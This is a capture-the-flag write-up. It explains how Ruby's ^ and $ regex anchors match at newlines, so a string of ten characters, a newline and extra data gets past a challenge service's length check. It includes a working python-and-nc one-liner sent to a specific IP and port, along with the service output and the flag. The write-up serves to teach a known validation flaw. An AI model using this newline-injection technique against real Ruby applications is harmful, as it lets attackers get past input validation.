Description
Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.
Solution
The problem with Ruby is the way it handles ^ and $. These are treated as
\n (new line).
So to exploit this service, all we need to do is to generate a string following these three steps
- 10 arbitrary characters
- Add a
0x0Aor\n - Add some more arbitrary data
Now, just send this string and ruby will happily accept it.
$ python -c 'print "f"*10 + "\x0A" + "fff"' | nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
Sum is: 1336
IW{RUBY_R3G3X_F41L}Flag: IW{RUBY_R3G3X_F41L}
References
Egor Homakov - Injects in Various Ruby Websites Through Regexp.